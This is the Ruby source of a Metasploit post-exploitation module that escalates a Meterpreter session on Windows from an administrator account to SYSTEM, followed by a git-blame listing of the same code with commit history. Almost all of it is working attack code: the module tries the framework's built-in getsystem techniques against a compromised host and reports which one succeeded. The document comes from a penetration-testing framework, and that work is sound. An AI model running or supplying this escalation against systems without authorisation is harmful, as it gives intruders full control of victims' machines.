modules/post/windows/escalate/getsystem.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasm'

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Priv

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Windows Escalate Get System via Administrator',
      'Description'   => %q{
          This module uses the builtin 'getsystem' command to escalate
        the current session to the SYSTEM account from an administrator
        user account.
      },
      'License'       => MSF_LICENSE,
      'Author'        => 'hdm',
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ]
    ))

    register_options([
      OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-4), otherwise try them all", 0])
    ])

  end

  def unsupported
    print_error("This platform is not supported with this script!")
    raise Rex::Script::Completed
  end

  def run

    technique = datastore['TECHNIQUE'].to_i

    unsupported if client.platform != 'windows' || (client.arch != ARCH_X64 && client.arch != ARCH_X86)

    if is_system?
      print_good("This session already has SYSTEM privileges")
      return
    end

    begin
      result = client.priv.getsystem(technique)
      print_good("Obtained SYSTEM via technique #{result[1]}")
    rescue Rex::Post::Meterpreter::RequestError => e
      print_error("Failed to obtain SYSTEM access")
    end
  end
end
Add a getsystem post module for automation 2011-11-11 16:19:49 -06:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add a getsystem post module for automation 2011-11-11 16:19:49 -06:00			`##`

			`require 'metasm'`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Post`
Retab modules 2013-08-30 16:28:54 -05:00			`include Msf::Post::Windows::Priv`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => 'Windows Escalate Get System via Administrator',`
			`'Description' => %q{`
			`This module uses the builtin 'getsystem' command to escalate`
			`the current session to the SYSTEM account from an administrator`
			`user account.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => 'hdm',`
			`'Platform' => [ 'win' ],`
			`'SessionTypes' => [ 'meterpreter' ]`
			`))`

			`register_options([`
			`OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-4), otherwise try them all", 0])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Retab modules 2013-08-30 16:28:54 -05:00
			`end`

			`def unsupported`
Rejig platform to use windows instead of win32/win64 2016-10-14 10:10:04 +10:00			`print_error("This platform is not supported with this script!")`
Retab modules 2013-08-30 16:28:54 -05:00			`raise Rex::Script::Completed`
			`end`

			`def run`

handle exception in getsystem module 2016-08-15 23:51:05 -05:00			`technique = datastore['TECHNIQUE'].to_i`
Retab modules 2013-08-30 16:28:54 -05:00
Final pass of regex -> string checks 2016-10-29 14:59:05 +10:00			`unsupported if client.platform != 'windows' \|\| (client.arch != ARCH_X64 && client.arch != ARCH_X86)`
Retab modules 2013-08-30 16:28:54 -05:00
			`if is_system?`
			`print_good("This session already has SYSTEM privileges")`
			`return`
			`end`

handle exception in getsystem module 2016-08-15 23:51:05 -05:00			`begin`
			`result = client.priv.getsystem(technique)`
			`print_good("Obtained SYSTEM via technique #{result[1]}")`
			`rescue Rex::Post::Meterpreter::RequestError => e`
			`print_error("Failed to obtain SYSTEM access")`
Retab modules 2013-08-30 16:28:54 -05:00			`end`
			`end`
Add a getsystem post module for automation 2011-11-11 16:19:49 -06:00			`end`